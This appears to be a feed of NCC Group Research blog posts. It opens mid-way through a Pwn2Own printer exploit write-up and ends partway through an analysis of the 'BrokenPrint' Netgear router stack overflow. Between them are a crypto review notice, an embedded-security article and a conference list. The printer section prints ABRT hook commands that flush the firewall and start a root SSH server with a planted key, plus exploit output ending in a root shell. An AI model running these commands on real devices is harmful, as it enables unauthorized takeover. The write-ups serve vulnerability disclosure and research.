echo "File ${file_to_compress} was compressed."
echo "Check apache server status if needed to restart"
to_restart=$(awk 'match($10,/AH00288/,b){a[b[0]]++}END{for(i in a) if (a[i] > 5) print a[i]}' "${file_to_compress}")
if [ $to_restart -gt "5" ]
then
echo "Time to restart apache .."
rm -f "${path_to_logs}"apache_error_log*
systemctl restart apache2
fi
rm -rf "${file_to_compress}"
else
echo "Error compressing file ${file_to_compress} (tar exit code: ${compress_exit_code})."
fi
fi
exit ${compress_exit_code}

Above file_to_compress is the apache error log file generated per the ErrorLog line shown earlier. After compressing the file successfully, the awk command is run against the file to determine if apache should be restarted, and then otherwise the file is deleted. The problem arises when multiple instances of this script are running at the same time, where one script deletes the log file from disk, and the second script runs awk on the file that no longer exists, which triggers the crash from noted above.

This crash can be triggered simply by sending a lot of HTTP traffic to the device.

Although we used this awk crash to trigger code execution, any remote pre-auth crash should be usable as long as it triggers ABRT to run.

Putting it all together

We use our temporary file write primitive to create the /etc/libreport/events.d/abort_edg.conf file with the following file (padded with lots of spaces due to requirements explained earlier):

EVENT=post-create /bin/ping 192.168.1.7 -c 4
        iptables -F
        /bin/ping 192.168.1.7 -c 4

We trigger a process crash, this will trigger ABRT to execute our above commands. We use interleaving ping commands to confirm when each intermediate command has been executed. We confirm the 8 ping packets being received using Wireshark. Then, we are able to connect to some listening service on the printer that is normally blocked by the firewall, confirming the firewall has been successfully disabled.

The following ABRT hook file disables the firewall, configures SSH and starts it:

EVENT=post-create iptables -F
    /bin/rm /var/fs/security/ssh/ssh_host_key
    mkdir /var/run/sshd || echo foo
    /usr/bin/ssh-keygen -b 256 -t ecdsa -N '' -f /var/fs/security/ssh/ssh_host_key
    echo "ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBABl6xVq6dGu40kDyxwjlMw7sxq4JGhVdc4hvDlDPPhzmAyEBkUWZOPRsLcWYm5kDJN6zFPTS0a4KNbx56qICwkyGAHfRv/+lVMxO2BEPJyYUUdpRC3qmUx0xy3GlgpOUUl90LgiifwcO6UI0P4l+UsewOrDdP6ycuklzJCaa7jLlPkMjQ==" > /var/fs/security/ssh/authorized
    /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
    while true; /bin/ping 192.168.1.7 -c 4; sleep 10; done

The exploit in action:

$ ./MissionAbrt.py -i 192.168.1.4
(13:20:01) [*] [file creation thread] running
(13:20:01) [*] Waiting for firewall to be disabled...
(13:20:01) [*] [file creation thread] connected
(13:20:01) [*] [file creation thread] file created
(13:20:01) [*] [crash thread] running
(13:20:09) [*] Firewall was successfully disabled
(13:20:09) [*] [crash thread] done
(13:20:10) [*] [file creation thread] done
(13:20:10) [*] All threads exited
(13:20:10) [*] Waiting for SSH to be available...
(13:20:10) [*] Spawning SSH shell
Line-buffered terminal emulation. Press F6 or ^Z to send EOF.

id
ABRT has detected 1 problem(s). For more info run: abrt-cli list
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~#

We see we started sshd under abrtd:

[email protected]:~# ps -axjf
...
   1  772  772  772 ?           -1 Ssl      0   0:00 /usr/sbin/abrtd -d -s
 772 2343  772  772 ?           -1 S        0   0:00  \_ abrt-server -s
2343 2550  772  772 ?           -1 SN       0   0:00      \_ /usr/libexec/abrt-handle-event -i --nice 10 -e post-create -- /var/fs/shared/svcerr/abrt/ccpp-2021-10-20-07:06:21-2117
2550 2947  772  772 ?           -1 SN       0   0:00          \_ /bin/sh -c echo 'mission abort!'             iptables -F             echo 'mission abort!'             /bin/rm /var/fs/security/ssh/ssh_host_key             echo 'mission a
2947 2952  772  772 ?           -1 SN       0   0:00              \_ /usr/sbin/sshd -D -o PermitRootLogin=without-password -o AllowUsers=root -o AuthorizedKeysFile=/var/fs/security/ssh/authorized -h /var/fs/security/ssh/ssh_host_key
2952 3107 3107 3107 ?           -1 SNs      0   0:00                  \_ sshd: [email protected]/0
3107 3109 3109 3109 pts/0     3128 SNs      0   0:00                      \_ -sh
3109 3128 3128 3109 pts/0     3128 RN+      0   0:00                          \_ ps -axjf

Final words on Pwn2Own

When participating at Pwn2Own, our first attempt failed due to an unknown SSH error, that we did not encounter in our own testing environment. We could see that our commands got executed (the firewall was disabled and the SSH server was started/reachable), but it would not let us connect. Previously to the Pwn2Own event, during our exploit development, we had also tested a netcat payload so we decided to start both payloads on the second attempt which made us win. This shows that having backup plans is always useful when participating at Pwn2Own!

✇NCC Group Research

Public Report – O(1) Labs Mina Client SDK, Signature Library and Base Components Cryptography and Implementation Review

By: Jennifer Fernick

During October 2021, O(1) Labs engaged NCC Group’s Cryptography Services team to conduct a cryptography and implementation review of selected components within the main source code repository for the Mina project. Mina implements a cryptocurrency with a lightweight and constant-sized blockchain, where the code is primarily written in OCaml. The selected components involved the client SDK, private/public key functionality, Schnorr signature logic and several other related functions. Full access to source code was provided with support over Discord, and two consultants delivered the engagement with eight person-days of effort.

The Public Report for this review may be downloaded below:

✇NCC Group Research

Hardware & Embedded Systems: A little early effort in security can return a huge payoff

By: Rob Wood

Editor’s note: This piece was originally published by embedded.com

There’s no shortage of companies that need help configuring devices securely, or vendors seeking to remediate vulnerabilities. But from our vantage point at NCC Group, we mostly see devices when working directly with OEMs confronting security issues in their products — and by this point, it’s usually too late to do much. We root out as many vulnerabilities as we can in the time allotted, but many security problems are already baked in. That’s why we advocate so strongly for security early in the development process.

Product Development

Product development for an embedded system has all the stages you expect to find in textbooks. While formal security assessments are most common in the quality testing phase, there is a role for security in all phases.


Figure 1: Typical product design cycle

Requirements and Threat Modelling

We see major security problems introduced even during requirements gathering. Insufficient due diligence here can cause many issues down the line. Conversely, even a little effort at this point can have a huge payoff at the end.

Security Requirements

Functional requirements tell you everything your product is supposed to do, and how. Security requirements outline all the things your product is not supposed to do, and that’s equally important. Security testing occupies this gap, and it’s a vital part of the process.


Figure 2: Testing vs. security testing

Threat Modelling

To develop your security requirements[1],[2], you need a solid understanding of the threat model. Before you can even consider appropriate security controls and mitigations, you must define the product’s security objectives, and the types of threats your product should withstand, in as much detail as possible[3]. This describes all the bad guys who want to compromise your systems and devices, as well as those of your customers and users. They come in many forms:

  • Remote attackers using a wired or wireless network interface (if the device has such capabilities). These attacks can scale easily and affect many devices at once.
  • Local attacks that require an ability to run code on the device, often as a lower privilege. Browser code or mobile apps are examples of such vectors.
  • Physical attackers with possession of the hardware. Lost or stolen devices, rogue administrators, temporary access through short-term rentals, and domestic abuse, are all common examples. This issue is harder to solve, and the best recourse is to increase the cost for the attacker. These come in two forms: cost to develop an attack, and cost to execute. Increasing the first may help buy you time, but if the product is to have any longevity in the market, it’s better to concentrate on the latter. Weaknesses such as sharing secrets across a fleet of devices is an all-too-common design pattern that leads to a near-zero execution cost (once the secret is known).

A reasonable baseline for nearly all modern products is to set the initial bar at “thousands of dollars,” which implies that an attack on the core chipset of the device is required. Anything less, and your product will very likely fall victim to a very cheap circuit attack. Setting the bar this high should not reflect the product cost or price, but rather the value of the assets that the device must protect. Mass market devices like smartphones have had this level of security since at least the early 2000s. And that’s good — every aspect of our lives is accessed by our smartphones, so the cost for an attacker should be high.

A formal threat model is a living document that can be adjusted and consulted as needed throughout the product development cycle.

Platform Selection

Next, you need to select your building blocks: the platform, processor, bootloaders and operating system.

Processor

Most embedded systems are built around a core microcontroller, system-on-chip (SoC) or other CPU. For most companies this involves outsourcing and technical debt: Building connected consumer devices, industrial control systems or vehicle ECUs typically means selecting a chipset from a third-party vendor that meets cost, performance and feature requirements. But let’s not forget security requirements: Not all components are designed with security in mind, and careful evaluation will make this clear. Make sure it has the security features you need — cryptographic accelerators, hardware random number generator, secure boot or other firmware integrity features, a modern memory management unit to implement privilege separation and memory protections, internal fuse-based security configuration, and a hardware root-of-trust. It’s also important to ensure that it doesn’t have security traps you want to avoid. For example:

  • Ask the vendor to show you the security audit of the internal ROM(s).
  • Get details about the security properties of the provisioning systems.
  • Ask how they handle devices returned for failure analysis after debug functionality has been disabled (you’ll be surprised how many admit to having a backdoor).
  • Understand specifics about how the hardware boots the software, security properties of the ROM, bootloader, and firmware reference design.

One crucial aspect of any processor is that it must form a trust anchor: a root-of-trust that can validate the integrity of the system firmware for subsequent boot stages. This typically consists of an immutable first-stage bootloader (in ROM or internal flash), and an immutable public key (commonly programmed into fuses). While all other aspects of the system firmware can be validated, the root-of-trust is trusted implicitly.

Operating System

Next you need to choose a software stack to run atop the hardware and boot system provided by your chip vendor. There are many commercial and open source embedded operating system vendors to choose from, with different levels of security maturity: Linux/Android, FreeRTOS, Zephyr, MbedOS, VxWorks, and more. Many companies will even roll their own. Your chipset vendor will influence the selection with a shortlist of operating systems they support, and anything else means more work for you. The key criteria here are privilege separation, memory protection, capabilities and access controls, secure storage, and modern exploit mitigations. Also important is a vendor commitment to providing ongoing support on the hardware platform you’re using.

Application Runtime

At the application level, where you implement the bulk of the business logic, you again have choices. Most vulnerabilities are memory corruption-related, and they can be severe, even catastrophic. Consequently, these are also among the few classes of vulnerabilities we know how to eliminate, and that’s by using modern memory safe programming languages. If your platform supports such an environment, then applications should be written in Java, Go, Rust or Python. Where this is not possible, employ strong defensive programming and secure development lifecycle (SDLC)[4] techniques to reduce the risk of developer errors ending up in the released product.

Other

Once the requirements are laid out and major platform decisions have been made, the bulk of the design, implementation and testing phases of the product development process can move forward. Through the development cycle, continual security review with reference to the threat model (with updates as needed) will keep you on the right path.

A few other security measures deserve mention:

Patching

Patching and ongoing maintenance is crucial to the continued operation of your devices. Threats evolve rapidly as vulnerabilities are discovered, and new attacker techniques are developed. Staying ahead of the bad guys requires that firmware updates be released on a regular cadence, and that there be a high adoption and installation of these patches. Automatic updates can make this extremely practical for most connected devices. Where safety considerations prevent automatic updates, or where users are otherwise involved in the update process, regular update behavior can sometimes be incentivized (e.g.: Apple has frequently included new emoji collections with their security updates to encourage user adoption).

One challenge is in the form of that technical debt you inherited when you outsourced your board support package. The chip business is sales-driven, and they have little incentive to maintain ongoing support for old devices and BSP versions. One way to help here is to ensure that ongoing security support is enshrined in the contract; otherwise, security is an afterthought.

Manufacturing and supply chain

If you are using a general-purpose microcontroller or SoC from a common vendor, you should expect the root-of-trust to be unconfigured until you provision it. This is where your manufacturing and production processes come into play — it is absolutely vital for these steps to be performed securely if your product is to rely on these bedrock security features[5]. However, there are strong incentives to outsource production to ODM or CM partners with low labor costs — the challenge is to ensure that your root-of-trust is securely configured even with potential threat actors in the factory[6].

Getting these processes in place early in the development cycle can be difficult, partly because secure firmware is likely to lag behind early hardware prototypes. Getting to them late can be equally difficult, because manufacturing is likely to resist process changes once they have a working recipe that produces widgets with the expected yield.

Repair and reverse logistics also likely require privileged access to your embedded devices. Ensuring that this privilege cannot be abused requires strong authentication on the calibration and configuration interfaces, and a careful understanding of the nuances of the production process for your specific devices.

Summary

Early threat modeling and the development of security requirements doesn’t have to be a burden, and it can save a great deal of time and effort if done at the right time. Incorporating input from your security experts will help you make the right platform choices and avoid the churn associated with repeated security fixes. Early engagement is far more effective.

References

[1] https://www.ioxtalliance.org/the-pledge

[2] https://ogi-cdn.s3.us-east-2.amazonaws.com/csis/firmware-security-best-practices-v1.1.pdf

[3] https://www.nccgroup.com/uk/our-research/security-of-things-an-implementers-guide-to-cyber-security-for-internet-of-things-devices-and-beyond/

[4] https://www.nccgroup.com/uk/our-services/cyber-security/specialist-practices/secure-development-cycle/

[5] https://www.nccgroup.trust/us/our-research/secure-device-provisioning-best-practices-heavy-truck-edition/

[6] https://www.nccgroup.trust/uk/our-research/secure-device-manufacturing-supply-chain-security-resilience/


Rob Wood is the VP for the Hardware and Embedded Security Services practice at cybersecurity consultancy, NCC Group. His career in embedded devices spans two decades, having worked at both BlackBerry and Motorola Mobility in roles focused on embedded software development, product firmware and hardware security, and supply chain security. Rob is an experienced firmware developer with extensive security architecture experience. His specialty is in designing, building, and reviewing products to push the security boundaries deeper into the firmware, hardware, and supply chain. He is most comfortable working with the software layers deep in the bowels of the system, well below userland, where the lines between hardware and software begin to blur. This includes things like the bootloaders, kernel, device drivers, firmware, baseband, trusted execution environments, debug and development tools, factory and repair tools, bare-metal firmware, and all the processes that surround them.

Tags: Design MethodsSecurity

✇NCC Group Research

Conference Talks – March 2022

By: Jennifer Fernick

This month, members of NCC Group will be presenting their work at the following conferences:

  • Juan Garrido, “Microsoft 365 APIs Edge Cases for Fun and Profit,” to be presented at RootedCon (March 10-12 2022)
  • Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google), “Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software,” to be presented at FOSS Backstage (March 17-18 2022)
  • Alma Rinasz, “You Got This: Stories of Career Pivots and How You Can Successfully Start Your Cyber Career,” to be presented at WiCys 2022 (March 17-19 2022)
  • James Chambers , “Reversing the Pokémon Snap Station without a Snap Station”, to be presented at ShmooCon (March 24-26 2022)

Please join us!

Microsoft 365 APIs Edge Cases for Fun and Profit
Juan Garrido
RootedCon
March 17-18 2022

Madrid, Spain

In this talk we describe and demonstrate multiple techniques for circumventing existing Microsoft 365 application security controls and how data can be exfiltrated from highly secure Microsoft 365 tenants which employ strict security policies.

That is, Microsoft 365 tenants with application policies to restrict access to a range of predefined IP addresses or subnets, or configured with Conditional Access Policies, which are used to control access to cloud applications. Assuming a Microsoft 365 configuration has enforced these types of security policy, we show how it can be possible to bypass these security features and exfiltrate information from multiple Microsoft 365 applications, such as OneDrive for Business, SharePoint Online, Yammer or even Exchange Online.


Preparing for Zero-Day: Vulnerability Disclosure in Open Source Software
Jennifer Fernick (NCC Group), Christopher Robinson (Intel), & Anne Bertucio (Google)
FOSS Backstage
March 17-18 2022

Berlin, Germany + Virtual

Open source software is incredibly powerful – and while that power is often used for good, it can be weaponized when open-source projects contain software security flaws that attackers can use to compromise those systems, or even the entire software supply chains that those systems are a part of. The Open Source Security Foundation is an open, cross-industry group aimed at improving the security of the open source ecosystem. In this presentation, members of the OpenSSF Vulnerability Disclosure working group will be sharing with open-source maintainers advice on how to handle when researchers disclose vulnerabilities in your project’s codebase – and we’ll also take any questions you have about this often mysterious topic! 

Part 1 of this presentation will give an overview of the basics of Coordinated Vulnerability Disclosure (CVD) for open-source software maintainers, including some basics about security vulnerabilities, how to communicate securely and write patches without leaking vulnerability information, what you can expect during a disclosure with a researcher, and how to handle challenging scenarios like when you can’t patch, when a vulnerability is already being exploited by a threat actor in the wild, or when a vulnerability impacts many downstream dependencies.

Part 2 of this presentation will include a discussion about vulnerability disclosure best practices, pitfalls, and challenges. We will also welcome questions from the audience – ask us anything about dealing with vulnerabilities in open source!


You Got This: Stories of Career Pivots and How You Can Successfully Start Your Cyber Career
Alma Rinasz (NCC Group), Meghan Jacquot (Recorded Future), Jennifer Cheung (WiCyS), Jennifer Bate (Deloitte), Ashley S.Richardson (Palo Alto Networks)
WiCys Conference 2022
March 17-19 2022

Cleveland, OH

A panel of four women, none started in cybersecurity, and all have successfully pivoted to the industry, will be moderated by another cybersecurity professional who also has her own story to share, she had a long career gap and then returned to cybersecurity. Emphasis and care were given to put together a diverse panel with a variety of backgrounds, experiences, and also a belief in #ShareTheMic. Two panelists are veterans and two panelists are BIPOC. Each panelist has her own story, but there are common threads of collaboration, curiosity, and determination. Questions will be carefully crafted in order to deliver a nuanced perspective to the audience. The hope is that the conference attendees have takeaways regarding representation (they can see themselves in the panel) as well as concrete ideas for how to pivot (if applicable), start in cyber, and be successful in the industry. The panel will end with time for a question and answer session this way attendees will have time for any questions they might have as well as the ability to network and get to know the panelists more. All panelists are involved in WiCySand encouraging women in tech and women in cybersecurity, so part of the focus of the panel will be to encourage the attendees that they too can be successful wherever they are in their journey. You’ve got this!


Reversing the Pokémon Snap Station without a Snap Station
James Chambers 
ShmooCon
March 24-26 2022
Washington, DC

Back in 1999 when the original Pokémon Snap was released for Nintendo 64, one of its coolest features was that you could head to a local Blockbuster and use a “Snap Station” to print out stickers of the photos you took in-game. Snap Stations are now rare collector’s items that few have access to, rendering the printing feature inaccessible.

Learning that they consisted of a Nintendo 64 console hooked up to a printer via video cables and a controller port, I set out to reverse engineer Pokémon Snap to see if I could restore the print functionality without access to the original kiosk hardware. This project involved a combination of software and hardware reverse engineering, facilitated by using an FPGA to make a physical link interface for Nintendo’s proprietary Joy Bus protocol. The resulting FPGA- based tool can also be used to simulate and interface with other peripherals, such as the Transfer Pak accessory which can be used to dump Game Boy cartridge data.

This presentation will demonstrate the reverse engineering and tooling processes, including tips on how hackers with a software background can go from following basic FPGA tutorials to creating real world hardware hacking tools.

✇NCC Group Research

BrokenPrint: A Netgear stack overflow

By: Alex Plaskett

Summary

This blog post describes a stack-based overflow vulnerability found and exploited in September 2021 by Alex Plaskett, Cedric Halbronn and Aaron Adams working at the Exploit Development Group (EDG) of NCC Group. The vulnerability was patched within the firmware update contained within the following Netgear advisory.

The vulnerability is in the KC_PRINT service (/usr/bin/KC_PRINT), running by default on the Netgear R6700v3 router. Although it is a default service, the vulnerability is only reachable if the ReadySHARE feature is turned on, which means a printer is physically connected to the Netgear router through an USB port. No configuration is needed to be made, so the default configuration is exploitable as soon as a printer is connected to the router.

This vulnerability can be exploited on the LAN side of the router and does not need authentication. It allows an attacker to get remote code execution as the admin user (highest privileges) on the router.

Our exploitation method is very similar to what was used in the Tokyo Drift paper i.e. we chose to change the admin password and start utelnetd service, which allowed us to then get a privileged shell on the router.

We have analysed and exploited the vulnerability on the V1.0.4.118_10.0.90 version, which we detail below, but older versions are likely vulnerable too.

Note: The Netgear R6700v3 router is based on the ARM (32-bit) architecture.

We have named our exploit "BrokenPrint". This is because "KC" is pronounced like "cassé" in French which means "broken" in English.

Vulnerability details

Background on ReadySHARE

This video explains well what ReadySHARE is, but it basically allows to access a USB printer through the Netgear router as if the printer were a network printer.

Reaching the vulnerable memcpy()

The KC_PRINT binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary.

The KC_PRINT binary creates lots of threads to handle different features:

The first thread handler we are interested in is ipp_server() at address 0xA174. We see it listens on port 631, and when it accepts a client connection, it creates a new thread handled by thread_handle_client_connection() at address 0xA4B4 and passes the client socket to this new thread.

void __noreturn ipp_server()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  addr_len = 0x10;
  optval = 1;
  kc_client = 0;
  pthread_attr_init(&attr);
  pthread_attr_setdetachstate(&attr, 1);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  if ( sock < 0 )
  {
    ...
  }
  if ( setsockopt(sock, 1, SO_REUSEADDR, &optval, 4u) < 0 )
  {
    ...
  }
  memset(&sin, 0, sizeof(sin));
  sin.sin_family = 2;
  sin.sin_addr.s_addr = htonl(0);
  sin.sin_port = htons(631u);                   // listens on TCP 631
  if ( bind(sock, (const struct sockaddr *)&sin, 0x10u) < 0 )
  {
    ...
  }

  // accept up to 128 clients simultaneously
  listen(sock, 128);
  while ( g_enabled )
  {
    client_sock = accept(sock, &addr, &addr_len);
    if ( client_sock >= 0 )
    {
      update_count_client_connected(CLIENT_CONNECTED);
      val[0] = 60;
      val[1] = 0;
      if ( setsockopt(client_sock, 1, SO_RCVTIMEO, val, 8u) < 0 )
        perror("ipp_server: setsockopt SO_RCVTIMEO failed");
      kc_client = (kc_client *)malloc(sizeof(kc_client));
      if ( kc_client )
      {
        memset(kc_client, 0, sizeof(kc_client));
        kc_client->client_sock = client_sock;
        pthread_mutex_lock(&g_mutex);
        thread_index = get_available_client_thread_index();
        if ( thread_index < 0 )
        {
          pthread_mutex_unlock(&g_mutex);
          free(kc_client);
          kc_client = 0;
          close(client_sock);
          update_count_client_connected(CLIENT_DISCONNECTED);
        }
        else if ( pthread_create(
                    &g_client_threads[thread_index],
                    &attr,
                    (void *(*)(void *))thread_handle_client_connection,
                    kc_client) )
        {
          ...
        }
        else
        {
          pthread_mutex_unlock(&g_mutex);
        }
      }
      else
      {
        ...
      }
    }
  }
  close(sock);
  pthread_attr_destroy(&attr);
  pthread_exit(0);
}

The client handler calls into do_http at address 0xA530:

void __fastcall __noreturn thread_handle_client_connection(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  while ( g_enabled && !do_http(kc_client) )
    ;
  close(client_sock);
  update_count_client_connected(CLIENT_DISCONNECTED);
  free(kc_client);
  pthread_exit(0);
}

The do_http() function reads a HTTP-like request until it finds the end of the HTTP headers \r\n\r\n into a 1024-byte stack buffer. It then searches for a POST /USB URI and an _LQ string where usblp_index is an integer. It then calls into is_printer_connected() at 0x16150.

The is_printer_connected() won’t be shown for brevity but all it does is open the /proc/printer_status file, tries to read its content and tries to find an USB port by looking for a string like usblp%d. This will only be found if a printer is connected to the Netgear router, meaning it will never continue further if no printer is connected.

unsigned int __fastcall do_http(kc_client *kc_client)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  kc_client_ = kc_client;
  client_sock = kc_client->client_sock;
  content_len = 0xFFFFFFFF;
  strcpy(http_continue, "HTTP/1.1 100 Continue\r\n\r\n");
  pCurrent = 0;
  pUnderscoreLQ_or_CRCL = 0;
  p_client_data = 0;
  kc_job = 0;
  strcpy(aborted_by_system, "aborted-by-system");
  remaining_len = 0;
  kc_chunk = 0;

  // buf_read is on the stack and is 1024 bytes
  memset(buf_read, 0, sizeof(buf_read));

  // Read in 1024 bytes maximum
  count_read = readUntil_0d0a_x2(client_sock, (unsigned __int8 *)buf_read, 0x400);
  if ( (int)count_read <= 0 )
    return 0xFFFFFFFF;

  // if received "100-continue", sends back "HTTP/1.1 100 Continue\r\n\r\n"
  if ( strstr(buf_read, "100-continue") )
  {
    ret_1 = send(client_sock, http_continue, 0x19u, 0);
    if ( ret_1 <= 0 )
    {
      perror("do_http() write 100 Continue xx");
      return 0xFFFFFFFF;
    }
  }

  // If POST /USB is found
  pCurrent = strstr(buf_read, "POST /USB");
  if ( !pCurrent )
    return 0xFFFFFFFF;
  pCurrent += 9;                                // points after "POST /USB"

  // If _LQ is found
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "_LQ");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  usblp_index = atoi(pCurrent);                 
  *pUnderscoreLQ_or_CRCL = Underscore;
  if ( usblp_index > 10 )                    
    return 0xFFFFFFFF;

  // by default, will exit here as no printer connected
  if ( !is_printer_connected(usblp_index) )
    return 0xFFFFFFFF;                          // exit if no printer connected

  kc_client_->usblp_index = usblp_index;

It then parses the HTTP Content-Length header and starts by reading 8 bytes from the HTTP content. Depending on values of these 8 bytes, it calls into do_airippWithContentLength() at 0x128C0 which is the one we are interested in.

  // /!\ does not read from pCurrent
  pCurrent = strstr(buf_read, "Content-Length: ");
  if ( !pCurrent )
  {
    // Handle chunked HTTP encoding
    ...
  }

  // no chunk encoding here, normal http request
  pCurrent += 0x10;
  pUnderscoreLQ_or_CRCL = strstr(pCurrent, "\r\n");
  if ( !pUnderscoreLQ_or_CRCL )
    return 0xFFFFFFFF;
  Underscore = *pUnderscoreLQ_or_CRCL;
  *pUnderscoreLQ_or_CRCL = 0;
  content_len = atoi(pCurrent);
  *pUnderscoreLQ_or_CRCL = Underscore;
  memset(recv_buf, 0, sizeof(recv_buf));
  count_read = recv(client_sock, recv_buf, 8u, 0);// 8 bytes are read only initially
  if ( count_read != 8 )
    return 0xFFFFFFFF;
  if ( (recv_buf[2] || recv_buf[3] != 2) && (recv_buf[2] || recv_buf[3] != 6) )
  {
    ret_1 = do_airippWithContentLength(kc_client_, content_len, recv_buf);
    if ( ret_1 < 0 )
      return 0xFFFFFFFF;
    return 0;
  }
  ...

The do_airippWithContentLength() function allocates a heap buffer to hold the entire HTTP content, copy the previously 8 bytes already read and reads the remaining bytes into that new heap buffer.

Note: there is no limit on the actual HTTP content size as long as malloc() does not fail due to insufficient memory, which will be useful later to spray memory.

Then, still depending on the values of the 8 bytes initially read, it calls into additional functions. We are interested in the Response_Get_Jobs() at 0x102C4 which contains the stack-based overflow we are going to exploit. Note that other Response_XXX() functions contain similar stack overflows but it seems Response_Get_Jobs() was the most straight forward to exploit, so we targeted this function.

unsigned int __fastcall do_airippWithContentLength(kc_client *kc_client, int content_len, char *recv_buf_initial)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  client_sock = kc_client->client_sock;
  recv_buf2 = malloc(content_len);
  if ( !recv_buf2 )
    return 0xFFFFFFFF;
  memcpy(recv_buf2, recv_buf_initial, 8u);
  if ( toRead(client_sock, recv_buf2 + 8, content_len - 8) >= 0 )
  {
    if ( recv_buf2[2] || recv_buf2[3] != 0xB )
    {
      if ( recv_buf2[2] || recv_buf2[3] != 4 )
      {
        if ( recv_buf2[2] || recv_buf2[3] != 8 )
        {
          if ( recv_buf2[2] || recv_buf2[3] != 9 )
          {
            if ( recv_buf2[2] || recv_buf2[3] != 0xA )
            {
              if ( recv_buf2[2] || recv_buf2[3] != 5 )
                Job = Response_Unk_1(kc_client, recv_buf2);
              else
                // recv_buf2[3] == 0x5
                Job = Response_Create_Job(kc_client, recv_buf2, content_len);
            }
            else
            {
              // recv_buf2[3] == 0xA
              Job = Response_Get_Jobs(kc_client, recv_buf2, content_len);
            }
          }
          else
          {
            ...
}

The first part of the vulnerable Response_Get_Jobs() function code is shown below:

// recv_buf was allocated on the heap
unsigned int __fastcall Response_Get_Jobs(kc_client *kc_client, unsigned __int8 *recv_buf, int content_len)
{
  char command[64]; // [sp+24h] [bp-1090h] BYREF
  char suffix_data[2048]; // [sp+64h] [bp-1050h] BYREF
  char job_data[2048]; // [sp+864h] [bp-850h] BYREF
  unsigned int error; // [sp+1064h] [bp-50h]
  size_t copy_len; // [sp+1068h] [bp-4Ch]
  int copy_len_1; // [sp+106Ch] [bp-48h]
  size_t copied_len; // [sp+1070h] [bp-44h]
  size_t prefix_size; // [sp+1074h] [bp-40h]
  int in_offset; // [sp+1078h] [bp-3Ch]
  char *prefix_ptr; // [sp+107Ch] [bp-38h]
  int usblp_index; // [sp+1080h] [bp-34h]
  int client_sock; // [sp+1084h] [bp-30h]
  kc_client *kc_client_1; // [sp+1088h] [bp-2Ch]
  int offset_job; // [sp+108Ch] [bp-28h]
  char bReadAllJobs; // [sp+1093h] [bp-21h]
  char is_job_media_sheets_completed; // [sp+1094h] [bp-20h]
  char is_job_state_reasons; // [sp+1095h] [bp-1Fh]
  char is_job_state; // [sp+1096h] [bp-1Eh]
  char is_job_originating_user_name; // [sp+1097h] [bp-1Dh]
  char is_job_name; // [sp+1098h] [bp-1Ch]
  char is_job_id; // [sp+1099h] [bp-1Bh]
  char suffix_copy1_done; // [sp+109Ah] [bp-1Ah]
  char flag2; // [sp+109Bh] [bp-19h]
  size_t final_size; // [sp+109Ch] [bp-18h]
  int offset; // [sp+10A0h] [bp-14h]
  size_t response_len; // [sp+10A4h] [bp-10h]
  char *final_ptr; // [sp+10A8h] [bp-Ch]
  size_t suffix_offset; // [sp+10ACh] [bp-8h]

  kc_client_1 = kc_client;
  client_sock = kc_client->client_sock;
  usblp_index = kc_client->usblp_index;
  suffix_offset = 0;                            // offset in the suffix_data[] stack buffer
  in_offset = 0;
  final_ptr = 0;
  response_len = 0;
  offset = 0;                                   // offset in the client data "recv_buf" array
  final_size = 0;
  flag2 = 0;
  suffix_copy1_done = 0;
  is_job_id = 0;
  is_job_name = 0;
  is_job_originating_user_name = 0;
  is_job_state = 0;
  is_job_state_reasons = 0;
  is_job_media_sheets_completed = 0;
  bReadAllJobs = 0;

  // prefix_data is a heap allocated buffer to copy some bytes
  // from the client input but is not super useful from an
  // exploitation point of view
  prefix_size = 74;                             // size of prefix_ptr[] heap buffer
  prefix_ptr = (char *)malloc(74u);
  if ( !prefix_ptr )
  {
    perror("Response_Get_Jobs: malloc xx");
    return 0xFFFFFFFF;
  }
  memset(prefix_ptr, 0, prefix_size);

  // copy bytes indexes 0 and 1 from client data
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 2u);
  in_offset += copied_len;

  // we make sure to avoid this condition to be validated
  // so we keep bReadAllJobs == 0
  if ( *recv_buf == 1 && !recv_buf[1] )
    bReadAllJobs = 1;
  offset += 2;

  // set prefix_data's bytes index 2 and 3 to 0x00
  prefix_ptr[in_offset++] = 0;
  prefix_ptr[in_offset++] = 0;
  offset += 2;

  // copy bytes indexes 4,5,6,7 from client data
  in_offset += memcpy_at_index(prefix_ptr, in_offset, &recv_buf[offset], 4u);
  offset += 4;
  copy_len_1 = 0x42;

  // copy bytes indexes [8,74] from table keywords
  copied_len = memcpy_at_index(prefix_ptr, in_offset, &table_keywords, 0x42u);
  in_offset += copied_len;
  ++offset;                                     // offset = 9 after this

  // job_data[] and suffix_data[] are 2 stack buffers to copy some bytes
  // from the client input but are not super useful from an
  // exploitation point of view
  memset(job_data, 0, sizeof(job_data));
  memset(suffix_data, 0, sizeof(suffix_data));
  suffix_data[suffix_offset++] = 5;

  // we need to enter this to trigger the stack overflow
  if ( !bReadAllJobs )
  {
    // iteration 1: offset == 9
    // NOTE: we make sure to overwrite the "offset" local variable
    // to be content_len+1 when overflowing the stack buffer to exit this loop after the 1st iteration
    while ( recv_buf[offset] != 3 && offset <= content_len )
    {
      // we make sure to enter this as we need flag2 != 0 later
      // to trigger the stack overflow
      if ( recv_buf[offset] == 0x44 && !flag2 )
      {
        flag2 = 1;
